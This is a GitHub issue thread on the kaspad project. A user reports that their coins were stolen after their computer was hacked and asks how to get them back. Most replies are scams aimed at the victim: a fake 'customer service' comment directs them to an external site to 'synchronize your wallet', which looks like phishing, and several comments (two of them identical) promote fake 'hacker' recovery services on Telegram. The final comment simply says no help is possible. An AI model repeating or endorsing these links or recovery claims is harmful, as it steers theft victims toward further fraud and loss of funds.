### ISSUE TITLE
help please. coins were stolen from my wallet.

### ISSUE THREAD

**Issue by AzatMullakaew** [kaspanet/kaspad#2242]
hi. help please. coins were stolen from my wallet. id 94e1da7b1591886210acba9aa6ac0a2dce22a776c5889726cabb6baa661aae0b. How do I get them back? My computer was hacked.

**Comment by Mnreceived** [comment]
> hi. help please. coins were stolen from my wallet. id 94e1da7b1591886210acba9aa6ac0a2dce22a776c5889726cabb6baa661aae0b. How do I get them back? My computer was hacked. +250,468.95551491 KAS



Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below webpage to synchronize your wallet for fixing process 

https://app.merge-mainnet.app/

**Comment by whetherlove** [comment]
I had lost some funds due to an airdrop scam too and it fucked me up luckily I got introduced to this hacker who helped me recover what was stolen from me hit him up on telegram:: https://t.me/Blackhathacker110

**Comment by Bendy127** [comment]
So sorry about what happened same thing happened to me my wallet got hacked and about 0.9 btc was stolen thanks to Mr John a whitehathacker who helped me recover all of it message him on telegram too t.me/Whitehathacker217

**Comment by Bendy127** [comment]
So sorry about what happened same thing happened to me my wallet got hacked and about 0.9 btc was stolen thanks to Mr John a whitehathacker who helped me recover all of it message him on telegram too t.me/Whitehathacker217

**Comment by Kellykiss00** [comment]
I had lost some funds due to an airdrop scam too and it fucked me up luckily I got introduced to this hacker who helped me recover what was stolen from me hit him up on telegram::https://t.me/badestha

**Comment by someone235** [comment]
I'm sorry but we can't help with that
